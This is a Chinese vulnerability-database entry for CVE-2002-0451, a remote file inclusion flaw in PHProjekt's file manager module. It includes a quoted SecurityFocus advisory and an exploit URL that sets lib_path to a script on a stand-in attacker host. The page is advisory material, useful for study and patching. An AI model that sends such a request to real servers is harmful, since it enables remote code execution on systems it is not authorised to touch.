PHPprojekt远程文件包含执行任意命令漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106643 漏洞类型 未知
发布时间 2002-03-13 更新时间 2005-05-02
CVE编号 CVE-2002-0451 CNNVD-ID CNNVD-200208-004
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21343
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-004
|漏洞详情
PHPprojekt是一款免费开放源代码的PHP组件程序包、包括日历、项目管理、时间卡系统、文件管理、联系人管理、邮件客户端和其他9项模块。运行在多种Linux和Unix系统平台下,也可运行在MicrosoftWindows操作系统下。PHPprojekt在文件管理模块下存在漏洞,远程攻击者可以通过提交包含远程主机上的脚本代码进行攻击。攻击者可以通过直接访问文件管理模式和并指定模块包含远程攻击者控制主机下建立的任意文件进行攻击,如果远程包含的文件是PHP脚本,此脚本将被系统执行。问题存在于filemanager/filemanager_forms.php的第一行:include_once("$lib_path/access_form.inc.php");攻击者可能利用此漏洞以httpd的权限在目标系统执行任意命令。能否成功利用此漏洞依靠主机系统上的php配置,如果php.ini中的'all_url_fopen'选项被设置成'off',此攻击将失败。
|漏洞EXP
source: http://www.securityfocus.com/bid/4284/info

PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems.

PHProjekt is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

Successful exploitation depends partly on the configuration of PHP on the host running the vulnerable software. If 'all_url_fopen' is set to 'off' then exploitation of this issue may be limited. 

http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts
|参考资料

来源:BID
名称:4284
链接:http://www.securityfocus.com/bid/4284
来源:XF
名称:phpprojekt-filemanager-include-files(8448)
链接:http://www.iss.net/security_center/static/8448.php
来源:BUGTRAQ
名称:20020313Commandexecutioninphprojekt.
链接:http://www.securityfocus.com/archive/1/261676
来源:www.phprojekt.com
链接:http://www.phprojekt.com/modules.php?op=modload&name=News&file=article&sid=19&mode=&order=